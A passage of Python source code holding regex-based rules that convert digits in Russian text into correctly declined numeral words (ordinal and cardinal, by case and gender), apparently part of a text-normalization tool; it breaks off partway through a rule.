        attr = words.get_attr(m.group(3).lower())
        if m.group(2) == 'м':
            if attr.have([M_GENDER, S_GENDER], False, [4]):
                number = ordinal(m.group(1), 't_mu')
            elif (attr.have([M_GENDER, S_GENDER], False, [5])
                  # Second-locative forms not covered by the dictionary.
                  or m.group(3) in ('берегу', 'бою', 'году', 'лесу', 'полку',
                                    'пруду', 'саду', 'углу', 'шкафу')):
                number = ordinal(m.group(1), 'p_mu')
        else:
            if attr.have([M_GENDER], False, [0]):
                number = ordinal(m.group(1), 'i_mu')
            elif attr.have([Z_GENDER], False, [1, 2, 4, 5]):
                number = ordinal(m.group(1), 't_zh')
        if number:
            return number + ' ' + m.group(3)
        return None
class OrdinalRule_6(RuleBase):
    """Ordinal numerals: "-е" suffix before a neuter phrase.

    Example: "1-е место -> первое место" (up to two neuter adjectives).
    """
    def __init__(self):
        self.mask = r'\b(\d+)-е (([а-яё]+[ео]е ){,2}([А-Я]?[а-яё]+[ео]))\b'
    def check(self, m):
        digits, phrase, head = m.group(1), m.group(2), m.group(4)
        if not words.have(head.lower(), [S_GENDER], False, [0, 3]):
            return None
        return ordinal(digits, 'i_sr') + ' ' + phrase
class OrdinalRule_8(RuleBase):
    """Ordinal numerals. Accusative case, feminine gender.

    Example: "102 школу -> сто вторую школу"
    """
    def __init__(self):
        self.mask = (r'(?<![,.])\b(\d*11|\d*[02-9]) ([а-яё]{2,})\b')
    def check(self, m):
        attr = words.get_attr(m.group(2))
        if attr.have([Z_GENDER], False, [3]) and not attr.have(case=[0]):
            # Build the feminine accusative from the masculine genitive
            # stem: "третьего" -> "третью", "второго" -> "вторую".
            if m.group(1)[-1] == '3':
                new = ordinal(m.group(1), 'r_mu')[:-3] + 'ю '
            else:
                new = ordinal(m.group(1), 'r_mu')[:-3] + 'ую '
            new += m.group(2)
            return new
        return None
class OrdinalRule_9(RuleBase):
    """Ordinal numerals. Genitive case.

    Example: "5 этажа -> пятого этажа, 6 школы -> шестой школы"
    """
    def __init__(self):
        self.mask = (
            r'(\A|\n|\(| )(\d*[02-9][05-9]|\d*1\d|[5-9]) ([А-Я]?[а-яё]{2,})\b')
    def check(self, m):
        number = ''
        attr = words.get_attr(m.group(3).lower())
        if attr.have([M_GENDER, S_GENDER], False, [1]):
            number = ordinal(m.group(2), 'r_mu')
        if attr.have([Z_GENDER], False, [1]):
            number = ordinal(m.group(2), 'r_zh')
        if number:
            return m.group(1) + number + ' ' + m.group(3)
        else:
            return None
class OrdinalRule_5(RuleBase):
    """Ordinal numerals. Dative case.

    Example: "23 дню -> двадцать третьему дню"
    """
    def __init__(self):
        self.mask = (
            r'(\A|\n|\(| )(\d*[02-9][02-9]|\d*1\d|[2-9]) ([а-яё]{2,})\b')
    def check(self, m):
        number = ''
        attr = words.get_attr(m.group(3))
        if attr.have([M_GENDER, S_GENDER], False, [2]):
            number = ordinal(m.group(2), 'd_mu')
        if (attr.have([Z_GENDER], False, [2])
                # Avoid forms that are also feminine genitive/prepositional.
                and not attr.have([Z_GENDER], False, [1, 5], all_case=True)):
            number = ordinal(m.group(2), 'd_zh')
        if number:
            return m.group(1) + number + ' ' + m.group(3)
        else:
            return None
class CardinalRule_10(RuleBase):
    """Cardinal numerals inside compound adjectives.

    Example: "3-кратный" -> "трёхкратный" and similar forms.
    """
    def __init__(self):
        self.mask = (r'(?<![,.-])\b((\d+) - |)(\d+)-(,? |[а-яё]{5,}\b)')
    def check(self, m):
        if m.group(1) == '':
            pre = ''
        else:
            # "N000-" compounds become "...тысяче-" prefixes.
            if m.group(2)[-3:] == '000':
                pre = cardinal(m.group(2)[:-3], r_ca) + 'тысяче - '
            else:
                pre = cardinal(m.group(2), r_ca) + ' - '
        if m.group(3)[-3:] == '000':
            num = cardinal(m.group(3)[:-3], r_ca) + 'тысяче'
        else:
            num = cardinal(m.group(3), r_ca)
        num = pre + num
        # Normalize the genitive forms to the compound-adjective stems.
        num = sub('ста', 'сто', num)
        num = sub(r'(одной тысячи|одноготысяче)', 'тысяче', num)
        num = sub(r'\bодного', 'одно', num)
        return num + m.group(4)
class CardinalRule_11(RuleBase):
    """Cardinal numerals. Genitive case in "от/с ... до ..." ranges.

    Example: "от 2 до 5 ..." -> both endpoints in the genitive.
    """
    def __init__(self):
        self.mask = (
            r'\b([Оо]т|[Сс]о?)'
            r'( почти | примерно | приблизительно | плюс | минус | )'
            r'((\d+,|)(\d+)( [-и] | или )|)(\d+,|)(\d+)( ([а-яё]+ |)[а-яё]+ | )'
            r'('
            r'до( [а-яё]+([иы]х|[ео]й|[ео]го) '
            r'| почти | примерно | приблизительно | плюс | минус | )'
            r'((\d+,|)\d+( [-и] | или )|)(\d+,|)\d+'
            r'( ([а-яё]+([иы]х|[ео]й|[ео]го) |и более |и менее |)([а-яё]+)|)'
            r')\b')
    def check(self, m):
        # Optional first numeral of an "N - M" / "N или M" pair.
        if m.group(3):
            if m.group(4):
                pre = decimal(m.group(4)[:-1], m.group(5), 1)
            else:
                pre = cardinal(m.group(5), r_ca)
            # "одного" must agree with the (possibly feminine) noun.
            if pre[-6:] == 'одного' and m.group(21) is not None:
                if words.have(m.group(21), [Z_GENDER], None, [1]):
                    pre = pre[:-2] + 'й'
                elif m.group(21) == 'суток':
                    pre = pre[:-3] + 'их'
            pre += m.group(6)
        else:
            pre = ''
        if m.group(7):
            number = decimal(m.group(7)[:-1], m.group(8), 1)
        else:
            number = cardinal(m.group(8), r_ca)
        if number[-6:] == 'одного' and m.group(21) is not None:
            if words.have(m.group(21), [Z_GENDER], None, [1]):
                number = number[:-2] + 'й'
            elif m.group(21) == 'суток':
                number = number[:-3] + 'их'
        return m.group(1) + m.group(2) + pre + number + m.group(9) + m.group(11)
class CardinalRule_12(RuleBase):
    """Cardinal numerals.
    Genitive case of the second numeral in the construction
    "numeral + noun + вместо/из/против + numeral".
    """
    def __init__(self):
        self.mask = (
            r'\b((\d+ )([а-яё]{3,})( вместо | из | против ))(\d+,|)(\d+)\b')
    def check(self, m):
        attr = words.get_attr(m.group(3))
        if m.group(5):
            number = decimal(m.group(5)[:-1], m.group(6), 1)
        else:
            number = cardinal(m.group(6), r_ca)
        day_forms = ('сутки', 'суток', 'суткам', 'сутками', 'сутках')
        # Agree "одного" with feminine nouns / pluralia tantum "сутки".
        if condition(m.group(6)) and attr.have([Z_GENDER]):
            number = number[:-2] + 'й'
        elif number[-6:] == 'одного' and m.group(3) in day_forms:
            number = number[:-3] + 'их'
        return m.group(1) + number
class CardinalRule_13(RuleBase):
    """Cardinal numerals. Genitive case after genitive-governing
    prepositions and comparison words ("более", "около", "до", ...).

    Fixes relative to the previous revision:
    * a missing ``|`` after ``[Вв] возрасте`` fused it with ``[Бб]лиже``
      into the unmatchable alternative "возрастеближе";
    * ``[Дд]остигше[ейм|`` had an unclosed character class, which merged
      it with the following ``[Дд]остигавше[ейм]`` alternative;
    * ``attr.have(Z_GENDER, ...)`` now passes the gender as a list like
      every other call site in this file.
    """
    def __init__(self):
        self.mask = (
            r'\b('
            r'[Бб]олее|[Мм]енее|[Бб]ольше|[Мм]еньше|[Вв]ыше|[Нн]иже|'
            r'[Дд][ао]льше|[Дд]ороже|[Дд]ешевле|[Оо]коло|[Сс]выше|[Сс]реди|'
            r'[Дд]ля|[Дд]о|[Ии]з|[Оо]т|[Бб]ез|[Уу]|[Вв]место|[Вв] возрасте|'
            r'[Бб]лиже|[Вв] количестве|[Вв] пределах|[Вв] течение|[Дд]линнее|'
            r'[Вв] размере|[Нн]ач[инаетялсьо]{2,7} с|[Пп]орядка|[Пп]осле|'
            r'[Дд]ости[гчаетья]{1,4}|[Дд]остига?л[аио]?|[Дд]остигн[еуть]{2,3}|'
            r'[Дд]остигши[еймх]|[Дд]остигавши[еймх]|[Дд]остигш[аеигмоуя]{2,3}|'
            r'[Дд]остигавш[аеигмоуя]{2,3}|[Дд]остигше[ейм]|[Дд]остигавше[ейм]|'
            r'[Вв]ладел[аеимухцыь]{2,5}|[Вв]нутри|[Вв] районе|[Нн]а уровне|'
            r'[Пп]ротив|[Сс]тарше|[Мм]оложе|[Кк]роме|[Пп]омимо|[Рр]анее|'
            r'[Нн]а протяжении|[Нн]е превы[сш][аи][авеийолтшщюья]{1,4}'
            r')'
            r'( приблизительно | примерно | почти | более чем | менее чем '
            r'| плюс | минус | максимум | минимум | )'
            r'((\d+,|)(\d+)( - | или )|)(\d+,|)(\d+)'
            r'( ([а-яё]+([иы]х|[ео]й|[ео]го) |и более |и менее |)'
            r'([а-яё]{3,})|(?!-))\b')
    def check(self, m):
        # Optional first numeral of an "N - M" / "N или M" pair.
        if m.group(3):
            if m.group(4):
                pre = decimal(m.group(4)[:-1], m.group(5), 1)
            else:
                pre = cardinal(m.group(5), r_ca)
            # "одного" must agree with a feminine noun / "сутки".
            if condition(m.group(5)) and m.group(12) is not None:
                attr = words.get_attr(m.group(12))
                if m.group(9) and attr.have([Z_GENDER], None, [1]):
                    pre = pre[:-2] + 'й'
                elif m.group(12) == 'суток':
                    pre = pre[:-3] + 'их'
            pre += m.group(6)
        else:
            pre = ''
        if m.group(7):
            number = decimal(m.group(7)[:-1], m.group(8), 1)
        else:
            number = cardinal(m.group(8), r_ca)
        if m.group(12) and condition(m.group(8)):
            attr = words.get_attr(m.group(12))
            if attr.have([Z_GENDER], False, [1]):
                number = number[:-2] + 'й'
            elif m.group(12) == 'суток':
                number = number[:-3] + 'их'
        elif m.group(3) and condition(m.group(8)):
            # No noun follows: mirror the ending of the first numeral.
            if m.group(3)[-1:] == 'й':
                number = number[:-2] + 'й'
            elif m.group(3)[-1:] == 'х':
                number = number[:-3] + 'их'
        new = m.group(1) + m.group(2) + pre + number + m.group(9)
        return new
class CardinalRule_14(RuleBase):
    """Cardinal numerals. Preposition "с"/"со" + genitive case."""
    def __init__(self):
        self.mask = (r'\b([Сс]о?'
                     r'( всех | [а-яё]+[иы]х | примерно | приблизительно '
                     r'| почти | плюс | минус | ))'
                     r'((\d+)( [-и] | или )|)(\d+)'
                     r'(( [а-яё]+([иы]х|[ео]й|[ео]го)|) ([а-яё]+))\b')
    def check(self, m):
        attr = words.get_attr(m.group(10))
        # Only applies when the trailing noun can be genitive.
        if attr.have(None, None, [1]):
            if m.group(3):
                prenum = cardinal(m.group(4), r_ca)
                if condition(m.group(4)) and attr.have([Z_GENDER], None, [1]):
                    prenum = prenum[:-2] + 'й'
                prenum += m.group(5)
            else:
                prenum = ''
            prenum = m.group(1) + prenum
            number = cardinal(m.group(6), r_ca)
            if attr.have([Z_GENDER], False, [1]):
                number = number[:-2] + 'й'
            return prenum + number + m.group(7)
        return None
class CardinalRule_15(RuleBase):
    """Cardinal numerals ending in 1 (but not 11). Genitive case."""
    def __init__(self):
        self.mask = (
            r'(\A|\n|\(| )((\d+) - |)(1|\d*[02-9]1)'
            r'(( [а-яё]+[ео]го | )([а-яё]+))\b')
    def check(self, m):
        attr = words.get_attr(m.group(7))
        a = attr.have([M_GENDER, S_GENDER], False, [1])
        b = attr.have([M_GENDER], False, [3])
        c = attr.have([Z_GENDER], False, [1])
        # Masculine/neuter genitive (but not also accusative), or
        # feminine genitive.
        if (a and not b) or c:
            number = cardinal(m.group(4), r_ca)
            if c:
                number = number[:-2] + 'й'
            if m.group(2) == '':
                pre = ''
            else:
                pre = cardinal(m.group(3), r_ca)
                pre += ' - '
            return m.group(1) + pre + number + m.group(5)
        return None
class CardinalRule_16(RuleBase):
    """Cardinal numerals ending in 2-4. Genitive case.

    Example: "3 дней -> трёх дней"
    """
    def __init__(self):
        self.mask = (
            r'(?<![,.])\b((\d+)( [-и] | или )|)'
            r'(\d*[02-9][234]|[234])(( [а-яё]+[иы]х | )([А-Я]?[а-яё]+))\b')
    def check(self, m):
        attr = words.get_attr(m.group(7).lower())
        a = attr.have([M_GENDER, S_GENDER, Z_GENDER], True, [1])
        # Suppletive plurals not resolved by the dictionary.
        b = m.group(7) in ('лет', 'человек')
        c = attr.have([M_GENDER], True, [5])
        if (a or b) and not c:
            if m.group(1):
                number = cardinal(m.group(2), r_ca)
                if attr.have(gender=Z_GENDER) and number[-2:] == 'го':
                    number = number[:-2] + 'й'
                number += m.group(3)
            else:
                number = ''
            return number + cardinal(m.group(4), r_ca) + m.group(5)
        return None
class CardinalRule_17(RuleBase):
    """Cardinal numerals. Instrumental-case exception:
    casualty phrases ("составил N погибшими ...").

    Inserts a "_" marker after the number so later rules keep the
    numeral in its plain (undeclined) reading.
    """
    def __init__(self):
        self.mask = (
            r'\b((состав(ил[аио]?|[ия]т|ля[ею]т)|потеря(л[аио]?|[ею]т)) \d+) '
            r'(погибшими|ранеными|убитыми)'
            r'(( и \d+) (погибшими|ранеными|убитыми)|)\b')
    def check(self, m):
        if m.group(6):
            new = m.group(7) + '_ ' + m.group(8)
        else:
            new = ''
        return m.group(1) + '_ ' + m.group(5) + new
class CardinalRule_18(RuleBase):
    """Cardinal numerals. Instrumental case before instrumental nouns."""
    def __init__(self):
        self.mask = (
            r'\b('
            r'(\d+,|)(\d+)'
            r'( - | или | и (почти |приблизительно |примерно |плюс |минус |))|'
            r')'
            r'(\d+) ([а-яё]+([аиыья]ми|[ео]м|[еиоы]й|ью))\b')
    def check(self, m):
        # Optional first numeral of a pair/range.
        if m.group(1):
            if m.group(2):
                pre = decimal(m.group(2)[:-1], m.group(3), 3)
            else:
                pre = cardinal(m.group(3), t_ca)
            if condition(m.group(3)):
                # Feminine agreement: "одним" -> "одной".
                a = words.have(m.group(7), [Z_GENDER], False, [4])
                b = words.have(m.group(7)[:-2], [Z_GENDER], False, [0])
                c = words.have(m.group(7)[:-3] + 'ь', [Z_GENDER], False, [0])
                if a or b or c:
                    pre = pre[:-2] + 'ой'
                elif m.group(8) == 'сутками':
                    pre = cardinal(m.group(3), t_ca) + 'и'
            pre += m.group(4)
        else:
            pre = ''
        number = ''
        if condition(m.group(6)):
            attr = words.get_attr(m.group(7))
            if attr.have([M_GENDER, S_GENDER], False, [4]):
                number = cardinal(m.group(6), t_ca)
            elif attr.have([Z_GENDER], False, [4]):
                number = cardinal(m.group(6), t_ca)[:-2] + 'ой'
            elif m.group(7) == 'сутками':
                number = cardinal(m.group(6), t_ca) + 'и'
            elif m.group(7)[-2:] == 'ми' and m.group(1):
                number = cardinal(m.group(6), t_ca)
                if attr.have([Z_GENDER], True, [4]):
                    number = cardinal(m.group(6), t_ca)[:-2] + 'ой'
        elif m.group(7)[-2:] == 'ми':
            number = cardinal(m.group(6), t_ca)
        if number:
            return pre + number + ' ' + m.group(7)
        return None
class CardinalRule_19(RuleBase):
    """Cardinal numerals after instrumental-governing prepositions
    ("между", "над", "перед", "по сравнению с", ...)."""
    def __init__(self):
        self.mask = (
            r'\b(([Мм]ежду|[Нн]ад|[Пп]еред|'
            r'[Пп]о сравнению со?|[Вв] сравнении со?) '
            r'(более чем |почти |приблизительно |примерно |плюс |минус |))'
            r'((\d+,|)(\d+)'
            r'( [-и] | или )'
            r'(почти |приблизительно |примерно |плюс |минус |)|)'
            r'(\d+,|)(\d+)\b(?!-)')
    def check(self, m):
        pre = m.group(1)
        if m.group(4):
            if m.group(5):
                pre += decimal(m.group(5)[:-1], m.group(6), 3)
            else:
                pre += cardinal(m.group(6), t_ca)
            pre = pre + m.group(7) + m.group(8)
        if m.group(9):
            number = decimal(m.group(9)[:-1], m.group(10), 3)
        else:
            number = cardinal(m.group(10), t_ca)
        return pre + number
class CardinalRule_20(RuleBase):
    """Cardinal numerals. Prepositional case before prepositional nouns.

    Fix: the two agreement probes for the optional first numeral called
    ``attr.have`` with four positional arguments, i.e. with the
    ``words.have(word, gender, plural, case)`` signature; they are now
    routed to ``words.have`` as at the other call sites in this file.
    """
    def __init__(self):
        self.mask = (
            r'(?<= )((\d+,|)(\d+)( [-и] | или )'
            r'(около |почти |примерно |приблизительно |плюс |минус |'
            r'более чем |менее чем |)|)'
            r'(\d+)( ([а-яё]+([иы]х|[ео][йм]) |с небольшим |)([а-яё]{3,}))\b')
    def check(self, m):
        attr = words.get_attr(m.group(10))
        if attr.have(None, None, [5], only_case=True) or m.group(10) == 'сутках':
            # Optional first numeral of a pair/range.
            if m.group(1):
                if m.group(2):
                    pre = decimal(m.group(2)[:-1], m.group(3), 4)
                else:
                    pre = cardinal(m.group(3), p_ca)
                # Feminine agreement: "одном" -> "одной".
                a = words.have(m.group(10), None, False, [2, 5])
                b = words.have(m.group(10)[:-1] + 'м', [Z_GENDER], True, [2])
                if condition(m.group(3)) and (a or b):
                    pre = pre[:-1] + 'й'
                elif condition(m.group(3)) and m.group(10) == 'сутках':
                    pre = pre[:-2] + 'их'
                pre += m.group(4) + m.group(5)
            else:
                pre = ''
            if condition(m.group(6)):
                if attr.have([M_GENDER, S_GENDER], False, [5]):
                    number = cardinal(m.group(6), p_ca)
                elif attr.have([Z_GENDER], False, [2, 5]):
                    number = cardinal(m.group(6), p_ca)[:-1] + 'й'
                elif m.group(10) == 'сутках':
                    number = cardinal(m.group(6), p_ca)[:-2] + 'их'
                else:
                    return None
            else:
                number = cardinal(m.group(6), p_ca)
            return pre + number + m.group(7)
        else:
            return None
class CardinalRule_22(RuleBase):
    """Cardinal numerals after prepositional-case prepositions
    ("о"/"об", "при")."""
    def __init__(self):
        self.mask = (
            r'\b(([Оо]б?|[Пп]ри)( минус| плюс| более чем| менее чем|))'
            r'( (\d+,|)(\d+)( ([-и]|или)( минус| плюс|) )| )'
            r'(\d+,|)(\d+)(?!-)\b')
    def check(self, m):
        number = ' '
        # Optional first numeral of a pair/range.
        if m.group(4) != ' ':
            if m.group(5):
                number += decimal(m.group(5)[:-1], m.group(6), 4)
            else:
                number += cardinal(m.group(6), p_ca)
            number += m.group(7)
        if m.group(10):
            number += decimal(m.group(10)[:-1], m.group(11), 4)
        else:
            number += cardinal(m.group(11), p_ca)
        return m.group(1) + number
class CardinalRule_23(RuleBase):
    """Cardinal numerals. Accusative case for decimal fractions
    after verbs from the ``pre_acc`` list ("... в N,M")."""
    def __init__(self):
        self.mask = (
            r'\b(([А-Яа-яЁё]{3,}) '
            r'(всего |ориентировочно |примерно |приблизительно |почти |'
            r'более чем |не более чем |)в )'
            r'((\d+,|)(\d+) - |)(\d+),(\d+)\b')
    def check(self, m):
        # Normalize "ё" before the dictionary lookup.
        preacc = sub('ё', 'е', m.group(2).lower())
        if preacc in pre_acc:
            new = m.group(1)
            if m.group(4):
                if m.group(5):
                    new += decimal(m.group(5)[:-1], m.group(6), 5)
                else:
                    new += m.group(6)
                new += ' - '
            new += decimal(m.group(7), m.group(8), 5)
            return new
        return None
class CardinalRule_24(RuleBase):
    """Cardinal numerals.
    Accusative case, masculine, for numerals ending in 1 (except 11)."""
    def __init__(self):
        self.mask = (
            r'(\A|\n|\(| )((\d+) - |)(1|\d*[02-9]1)'
            r'(( [а-яё]+[ео]го | )([а-яё]+))\b')
    def check(self, m):
        attr = words.get_attr(m.group(7))
        # Animate masculine accusative only (not nominative look-alikes).
        if (attr.have([M_GENDER], False, [3])
                and not attr.have([M_GENDER], False, [0])):
            number = cardinal(m.group(4), v_ca)[:-2] + 'ного'
            if m.group(2) == '':
                pre = ''
            else:
                pre = cardinal(m.group(3), v_ca)
                if condition(m.group(3)):
                    pre = pre[:-2] + 'ного'
                elif pre[-3:] == 'два':
                    pre = pre[:-1] + 'ух'
                elif pre[-3:] == 'три' or pre[-3:] == 'ыре':
                    pre = pre[:-1] + 'ёх'
                pre += ' - '
            return m.group(1) + pre + number + m.group(5)
        return None
class CardinalRule_25(RuleBase):
    """Cardinal numerals. Accusative case after the prepositions
    "в", "на", "за", "про", "спустя", "через".

    Adjusts the trailing small numeral ("один"/"два"/"три"/"четыре")
    for gender, animacy and the pluralia-tantum nouns
    ("сутки", "брюки", "ножницы").
    """
    def __init__(self):
        self.mask = (
            r'\b([Вв]|[Нн]а|[Зз]а|[Пп]ро|[Сс]пустя|[Чч]ерез)'
            r'( (\d+,|)(\d+)( -| или)|) (\d+,|)(\d+)'
            r'(( [а-яё]+([ая]я|[ую]ю|[еиоы]е|[иы][йх]) | )([а-яё]+))\b')
    def check(self, m):
        attr = words.get_attr(m.group(11))
        # Precomputed agreement predicates, shared below.
        a = attr.have([M_GENDER], False, [3])
        b = attr.have([M_GENDER], False, [0])
        c = a and not b
        d = attr.have([Z_GENDER], False, [1, 3])
        e = attr.have([Z_GENDER], True, [1])
        f = d or e
        g = attr.have([S_GENDER], False, [0, 1])
        h = attr.have([S_GENDER], True, [1])
        i = attr.have([M_GENDER, Z_GENDER], True, [1, 3], all_case=True)
        if m.group(6):
            if (attr.have([M_GENDER, S_GENDER, Z_GENDER], None, [1])
                    or m.group(11) in ('суток', 'лет')):
                number = decimal(m.group(6)[:-1], m.group(7), 5)
            else:
                return None
        else:
            number = cardinal(m.group(7), v_ca)
            if attr.have([M_GENDER], False, [0, 3], all_case=True):
                pass
            elif number[-3:] == 'дин':
                if m.group(11) in ('сутки', 'брюки', 'ножницы'):
                    number = number[:-2] + 'ни'
                elif c:
                    number = number[:-2] + 'ного'
                elif attr.have([Z_GENDER], False, [3]):
                    number = number[:-2] + 'ну'
                elif attr.have([S_GENDER], False, [0, 3]):
                    number = number[:-2] + 'но'
                else:
                    return None
            elif number[-3:] == 'два':
                if m.group(11) in ('суток', 'брюк', 'ножниц'):
                    number = number[:-1] + 'ое'
                elif m.group(11) in ('сутки', 'брюки', 'ножницы'):
                    return None
                elif attr.have([M_GENDER, Z_GENDER], True, [1]):
                    number = number[:-1] + 'ух'
                elif attr.have([Z_GENDER], False, [1]):
                    number = number[:-1] + 'е'
            elif number[-3:] == 'три':
                if m.group(11) in ('суток', 'брюк', 'ножниц'):
                    number = number[:-1] + 'ое'
                elif i:
                    number = number[:-1] + 'ёх'
                elif m.group(11) in ('сутки', 'брюки', 'ножницы'):
                    return None
                else:
                    pass
            elif number[-3:] == 'ыре':
                if m.group(11) in ('суток', 'брюк', 'ножниц'):
                    number = number[:-3] + 'веро'
                elif i:
                    number = number[:-1] + 'ёх'
                elif m.group(11) in ('сутки', 'брюки', 'ножницы'):
                    return None
                else:
                    pass
            elif (attr.have([M_GENDER, S_GENDER, Z_GENDER], True, [1])
                    or m.group(11) in ('суток', 'лет')):
                pass
            else:
                return None
        # Optional first numeral of a pair/range: same adjustments.
        if m.group(2):
            if m.group(3):
                pre = decimal(m.group(3)[:-1], m.group(4), 5)
            else:
                pre = cardinal(m.group(4), v_ca)
                if pre[-3:] == 'дин':
                    if m.group(11) in ('сутки', 'суток', 'брюки', 'брюк',
                                       'ножницы', 'ножниц'):
                        pre = pre[:-2] + 'ни'
                    elif (attr.have([M_GENDER], False, [1, 3], all_case=True)
                          or attr.have([M_GENDER], True, [1, 3], all_case=True)):
                        pre = pre[:-2] + 'ного'
                    elif f:
                        pre = pre[:-2] + 'ну'
                    elif g or h:
                        pre = pre[:-2] + 'но'
                elif pre == 'два':
                    if m.group(11) in ('сутки', 'суток', 'брюки', 'брюк',
                                       'ножницы', 'ножниц'):
                        pre = pre[:-1] + 'ое'
                    elif (c or attr.have([M_GENDER, Z_GENDER], True, [1, 3],
                                         all_case=True)):
                        pre = pre[:-1] + 'ух'
                    elif f:
                        pre = pre[:-1] + 'е'
                elif pre == 'три':
                    if m.group(11) in ('сутки', 'суток', 'брюки', 'брюк',
                                       'ножницы', 'ножниц'):
                        pre = pre[:-1] + 'ое'
                    elif (c or attr.have([M_GENDER, Z_GENDER], True, [1, 3],
                                         all_case=True)):
                        pre = pre[:-1] + 'ёх'
                elif pre == 'четыре':
                    if m.group(11) in ('сутки', 'суток', 'брюки', 'брюк',
                                       'ножницы', 'ножниц'):
                        pre = pre[:-3] + 'веро'
                    elif (attr.have([M_GENDER, Z_GENDER], True, [1, 3],
                                    all_case=True)):
                        pre = pre[:-1] + 'ёх'
            pre += m.group(5) + ' '
        else:
            pre = ''
        return m.group(1) + ' ' + pre + number + m.group(8)
class CardinalRule_27(RuleBase):
    """Cardinal numerals ending in 1 (not 11).
    Accusative case, feminine gender.
    """
    def __init__(self):
        self.mask = (
            r'(?<![,.])\b(\d*[02-9]1|1)'
            r'(( [а-яё]+[ую]ю | с половиной | с лишним | )([а-яё]+))')
    def check(self, m):
        noun = m.group(4)
        if not words.have(noun, [Z_GENDER], False, [3]):
            return None
        # "один" -> "одну": swap the masculine ending for the feminine one.
        stem = cardinal(m.group(1), v_ca)[:-2]
        return stem + 'ну' + m.group(2)
class CardinalRule_28(RuleBase):
    """Cardinal numerals. Neuter gender (nominative/accusative).

    Works on the digit string itself: a trailing "1" is replaced by
    "0 одно" (e.g. "21" -> "20 одно") so later rules expand the rest.
    """
    def __init__(self):
        self.mask = (
            r'(?<![,.])\b((\d+)( [-и] | или )|)(\d+)'
            r'( ([а-яё]+([ео]е|[иы]х) |)([а-яё]+))\b')
    def check(self, m):
        if (words.have(m.group(8), [S_GENDER], False, [0, 1])
                or words.have(m.group(8), [S_GENDER], True, [1])):
            if m.group(1):
                if condition(m.group(2)):
                    if len(m.group(2)) > 1:
                        pre = m.group(2)[:-1] + '0 одно'
                    else:
                        pre = 'одно'
                else:
                    pre = m.group(2)
                pre += m.group(3)
            else:
                pre = ''
            if condition(m.group(4)):
                if len(m.group(4)) > 1:
                    number = m.group(4)[:-1] + '0 одно'
                else:
                    number = 'одно'
            else:
                number = m.group(4)
            return pre + number + m.group(5)
        else:
            return None
class CardinalRule_29(RuleBase):
    """Cardinal numerals. Feminine gender (nominative/accusative)."""
    def __init__(self):
        self.mask = (
            r'(\A|\n|\(| )(((\d+)( - | или | и ))|)(\d+,|)(\d+)'
            r'((( [а-яё]+([ая]я|[иы][ех]))+'
            r'| с половиной| с лишним|) ([а-яё]+))')
    def check(self, m):
        attr = words.get_attr(m.group(12))
        a = attr.have([Z_GENDER], None, [1])
        b = attr.have([Z_GENDER], False, [0]) and condition(m.group(7))
        if (a or b):
            new = m.group(1)
            if m.group(2):
                new += feminin(m.group(4)) + m.group(5)
            # Decimal fractions keep their digits; genitive nouns after a
            # number ending in 1 are rejected.
            if m.group(6):
                new += m.group(6) + m.group(7) + m.group(8)
            elif a and condition(m.group(7)):
                return None
            else:
                new += feminin(m.group(7)) + m.group(8)
            return new
        return None
class CardinalRule_30(RuleBase):
    """Cardinal numerals. Dative case.

    Fixes relative to the previous revision:
    * the "сутками->суткам" check for the second numeral compared
      ``m.group(8)`` (a two/three-letter adjective suffix, which can
      never equal "суткам") instead of ``m.group(9)`` -- the noun --
      as the matching check for the first numeral already did;
    * when the optional first numeral is absent, the agreement fix-ups
      and ``pre += m.group(3)`` ran on ``None`` groups; they now run
      only in the branch where the first numeral exists.
    """
    def __init__(self):
        self.mask = (
            r'(?<![,.])\b((\d+)( [-и] | или )|)(\d+)'
            r'(( ([а-яё]+-|)[а-яё]+([иы]м|[ео]му) | )([а-яё]+([аиыя]м|у|ю|е)))\b')
    def check(self, m):
        # Optional first numeral of a pair/range.
        if m.group(1) == '':
            pre = ''
        else:
            pre = ' ' + cardinal(m.group(2), d_ca)
            attr = words.get_attr(m.group(9))
            a = attr.have([Z_GENDER], None, [2])
            b = attr.have([Z_GENDER], False, [5])
            if condition(m.group(2)) and (a or b):
                pre = pre[:-2] + 'й'
            elif m.group(9) == 'суткам':
                pre = pre[:-3] + 'им'
            pre += m.group(3)
        number = ''
        if condition(m.group(4)):
            if words.have(m.group(9), [M_GENDER, S_GENDER], False, [2]):
                number = cardinal(m.group(4), d_ca)
            elif words.have(m.group(9), [Z_GENDER], False, [2, 5]):
                number = cardinal(m.group(4), d_ca)[:-2] + 'й'
            elif m.group(9) == 'суткам':
                number = cardinal(m.group(4), d_ca)[:-3] + 'им'
            elif words.have(m.group(9), [M_GENDER, S_GENDER, Z_GENDER], True, [2]):
                number = cardinal(m.group(4), d_ca)
        if number:
            return pre + number + m.group(5)
        return None
class CardinalRule_31(RuleBase):
    """Cardinal numerals. Dative case.

    Example: "к 25 -> к двадцати пяти"
    """
    def __init__(self):
        self.mask = (
            r'\b([Кк] |рав[нагеийлмоcуюыхья]{2,6} |'
            r'равносил[агеимноуыхья]{2,5} |эквивалент[аеноы]{2} )'
            r'(всего |почти |примерно |приблизительно |плюс |минус |)'
            r'((\d+,|)(\d+)( [-и] | или )|)(\d+,|)(\d+)\b(?!-)')
    def check(self, m):
        number = ''
        # Optional first numeral of a pair/range.
        if m.group(3):
            if m.group(4):
                number += decimal(m.group(4)[:-1], m.group(5), 2)
            else:
                number += cardinal(m.group(5), d_ca)
            number += m.group(6)
        if m.group(7):
            number += decimal(m.group(7)[:-1], m.group(8), 2)
        else:
            number += cardinal(m.group(8), d_ca)
        return m.group(1) + m.group(2) + number
class CardinalRule_35(RuleBase):
    """Cardinal numerals: preposition "по" with a decimal fraction."""
    def __init__(self):
        self.mask = r'\b([Пп]о )(\d+),(\d+)\b'
    def check(self, m):
        whole, frac = m.group(2), m.group(3)
        if not (condition(whole) or condition(frac)):
            return None
        return m.group(1) + decimal(whole, frac, 2)
class Rule_1(RuleBase):
    """Restore the letter Ё.

    Example: "все небо" -> "всё небо"
    """
    def __init__(self):
        self.mask = r'\b([Вв]с)е ([а-яё]+)\b'
    def check(self, m):
        prefix, noun = m.group(1), m.group(2)
        if not words.have(noun, [S_GENDER], False, [0, 3]):
            return None
        return prefix + 'ё ' + noun
class CardinalRule_26(RuleBase):
    """Cardinal numerals ending in 1 (not 11). Prepositional case.

    Example: "в 21 принадлежащей -> в двадцати одной принадлежащей"
    """
    def __init__(self):
        self.mask = (r'\b([Вв] |[Нн]а |[Пп]ри |[Оо]б? )'
                     r'(\d*[02-9]1|1)( [а-яё]+[ео](й|м)(|ся))\b')
    def check(self, m):
        new = m.group(1) + cardinal(m.group(2), p_ca)
